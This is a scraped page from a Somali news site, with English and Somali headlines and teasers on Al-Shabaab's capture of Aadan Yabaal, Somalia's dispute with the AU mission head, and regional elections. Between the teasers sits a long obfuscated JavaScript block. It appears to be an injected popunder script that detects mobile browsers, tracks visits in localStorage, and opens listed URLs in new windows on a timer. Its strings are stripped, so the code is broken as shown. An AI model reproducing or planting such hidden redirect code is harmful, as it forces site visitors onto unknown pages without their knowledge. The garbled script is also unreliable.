Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali General Criticizes Army’s Defensive Tactics Amid Al-Shabaab Gains

MOGADISHU, April 19, 2025 (SMN) – Somali General Sheikh Yusuf Indha-Cadde has voiced strong criticism of the country's military strategy, following Al-Shabaab’s recent capture of Aadan Yabaal district in Middle Shabelle region.   In an interview with Radio Shabelle, General Indha-Cadde expressed deep concern over what he described as the Somali National Army's passive posture in the face of militant threats....

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Dowladda Federaalka oo laga dalbaday garab-istaaga Puntland

Xildhibaan Cismaan Cali oo ka mid ah mudaneyaasha Golaha Shacabka ayaa ugu baaqay Dowladda Federaalka Soomaaliya in ay u midowda dagaalka lagula jiro Kooxaha Al Shabaab iyo Daacish.   Wuxuu sheegay in labadan koox ay halis ku yihiin jiritaanka Dowladda Federaalka Soomaaliya, isagoona xusay in madaxda dalka looga baahan yahay in ay u jiheestaan ciribtirkooda. Mudanahan oo ka soo jeeda degaannada Puntland,...

Khasaaraha dhimasho dagaalkii Aadan Yabaal oo kordhay          

Waxaa kordhay khasaaraha dhimasho ee ka dhashay dagaal dhowaan Kooxda Al Shabaab ay ku qaadday Degmada Aadan Yabaal ee Goboka Sh.Dhexe oo qiyaas 245km dhanka waqooyi uga beegan Magaalada Muqdisho.   Guddoomiye ku xigeenkii hore ee Duqa Muqdisho,  Ibraahim Mahad-Alle ayaa wuxuu sheegay in 200 ka tirsanaa askarta Ciidanka Xoogga Dalka lagu dilay dagaalkii ka dhacay Degmada Aadan Yabaal. Wuxuu sheegay in...

Xiisad dagaal oo ka taagan Gobolka Galgaduud

Xiisad dagaal ayaa laga soo warinayaa inta u dhaxeysa degmooyinka Ceel Dheer iyo Masagawaa ee gobolka Galgaduud kadib markii degaano kaabiga ku haya labada degmo ay soo galeen dagaal yahano ka tirsan Kooxda Al Shabaab.   Wararka ayaa sheegaya in laga cabsi qaba in halkaasi isku fara-saaraan Ciidanka Xoogga Dalka iyo kuwa Kooxda Al Shabaab. Dhinaca kale, ciidamo badan oo ka tirsan...

Muxuu Janaraal Indho-Cadde ka yiri soo rogaal-celinta Al Shabaab?

Janaraal Sheekh Yuusuf Indha-Cadde ayaa si qoto dheer uga hadlay weerarada gaadmada Al Shabaab iyo sida ay ugu suuro-gashay in ay qabsadaan Degmada Aaadan Yabaal ee Gobolka Sh.Dhexe.   Janaraal Indho-Cadde oo wareysi siiyay Idaacadda Shabelle ayaa sheegay in aysan aheyn wax wanaagsan in Ciidanka Xoogga Dalka ay galaan difaac maadaama sida uu tilmaamay Al Shabaab ay yihiin dagaal yahano is...

Dowladda Soomaaliya oo eedeyn culus u jeedisay Madaxa KMG ah ee AUSSOM

Muqdisho, Soomaaliya – Wasiirka Arrimaha Dibadda ee Xukuumadda Federaalka Soomaaliya, Axmed Macallin Fiqi, ayaa si kulul u weeraray siihayaha Madaxa Howlgalka Midowga Afrika ee Soomaaliya (AUSSOM), Danjire Sivuyile Thandikhaya Bam, isagoo ku eedeeyay inuu taageero u yahay kooxda argagixisada ah ee Al-Shabaab.   Wasiir Fiqi ayaa sheegay in Danjire Bam – oo u dhashay dalka Koonfur Afrika isla markaana ah ku...

Somalia Accuses AU Mission Head of Supporting Al-Shabaab, Signals Potential Expulsion

Mogadishu, Somalia — Somalia’s Minister of Foreign Affairs, Ahmed Moallim Fiqi, has issued a strong statement against the Acting Head of the African Union Transition Mission in Somalia (ATMIS), Amb. Sivuyile Thandikhaya Bam, accused him of sympathizing with the terrorist group Al-Shabaab.   Minister Fiqi alleged that the South African diplomat—who also serves as the Deputy and Acting Special Representative of...

Wasiirka Maaliyadda XFS Mudane Biixi Imaan Cige oo la kulmay wufuud caalami ah

Wasiirka Maaliyadda XFS Mudane Biixi Imaan Cige ayaa shir-gudoomiyay kulanka gabagabaynta shirarka wafdi heer sare ah oo ka socday Bangiga Horumarinta Islaamka, kuwaas oo la tashiyo kala duwan la yeeshay qaar ka mid ah hay'adaha Dowladda, iyadoo si gaar ah looga arrinsaday arrimaha mudnaanta u leh Dowladda Soomaaliya oo kow ay u tahay dib-u-howlgelinta taariikhiga ah ee xiriirka tooska...

U.S. Opposes U.N. Plan to Fund African Union Mission in Somalia

WASHINGTON (SMN) — The United States has openly rejected a United Nations proposal to fund the African Union's new Stabilization and Support mission in Somalia, known as AUSSOM, which began operations in the country in January.   The U.S. stance has sparked significant concern over the future of AUSSOM’s mandate, which focuses on stabilizing Somalia and countering the militant group al-Shabaab. The...

WARAR KALE

Talks to Free Egyptian Sailors Held by Somali Pirates Collapse Over Ransom Dispute

MOGADISHU — Negotiations aimed at securing the release of eight Egyptian sailors held hostage by Somali pirates have collapsed after the kidnappers withdrew from...

Aadan Madoobe oo Ku Guuleystay Doorashada Madaxtinimada Koonfur Galbeed

BAYDHABO – Guddoomiyaha Golaha Shacabka Soomaaliya, Aadan Maxamed Nuur (Aadan Madoobe), ayaa ku guuleystay doorashada madaxtinimada Dowlad Goboleedka Koonfur Galbeed, kadib codbixin ay sameeyeen...

Somalia’s Parliament Speaker Wins South West State Presidential Election

BAIDOA, Somalia — Somalia's House of the People Speaker, Aden Mohamed Nur Madobe, was elected president of South West State on Wednesday in a...